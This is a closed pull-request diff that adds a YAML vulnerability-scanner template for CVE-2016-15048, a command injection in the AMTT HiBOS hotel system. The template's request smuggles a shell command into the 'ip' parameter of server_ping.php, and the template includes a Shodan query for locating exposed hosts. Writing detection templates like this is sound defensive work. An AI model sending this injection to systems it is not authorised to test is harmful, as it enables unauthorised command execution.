Skip to content
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
42 changes: 42 additions & 0 deletions http/cves/2016/CVE-2016-15048.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
id: CVE-2016-15048

info:
name: AMTT Hotel Broadband Operation System (HiBOS) - Command Injection
author: DanLika
severity: critical
description: |
AMTT Hotel Broadband Operation System (HiBOS) is vulnerable to an unauthenticated command injection.
This is caused by improper validation of the 'ip' parameter in '/manager/radius/server_ping.php',
allowing remote attackers to execute arbitrary system commands.
reference:
- https://wooyun.laolisafe.com/bug_detail.php?wybug_id=wooyun-2016-0181444
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-15048
cwe-id: CWE-78
metadata:
verified: true
shodan-query: http.title:"HiBOS"
tags: cve,cve2016,hibos,rce,unauth,amtt

http:
- method: GET
path:
- "{{BaseURL}}/manager/radius/server_ping.php?id=1&ip=;expr%20111%20%5c*%20111"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "12321"
part: body

- type: word
words:
- "text/html"
part: header